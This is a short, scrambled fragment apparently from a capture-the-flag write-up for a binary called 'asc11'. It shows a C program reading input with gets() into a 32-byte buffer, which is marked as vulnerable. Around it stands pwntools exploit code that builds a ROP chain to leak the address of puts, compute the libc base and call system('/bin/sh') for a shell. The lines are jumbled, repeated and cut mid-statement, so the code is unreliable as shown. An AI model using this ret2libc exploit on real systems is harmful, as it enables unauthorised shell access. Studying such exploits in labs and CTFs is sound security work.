Asc 11 π
payload = b'A'*offset + rop.chain() p.sendlineafter(b'Input: ', payload)
void main(void) char buf[32]; setvbuf(stdout, NULL, 2, 0); puts("Input: "); gets(buf); // <-- vulnerable asc 11
p = process('./asc11') offset = 40 ROP to leak puts@got rop = ROP(elf) rop.puts(elf.got['puts']) rop.call(elf.symbols['main']) payload = b'A'*offset + rop
leak = u64(p.recvline().strip().ljust(8, b'\x00')) libc.address = leak - libc.symbols['puts'] log.success(f'Libc base: hex(libc.address)') rop2 = ROP(libc) rop2.system(next(libc.search(b'/bin/sh'))) payload) void main(void) char buf[32]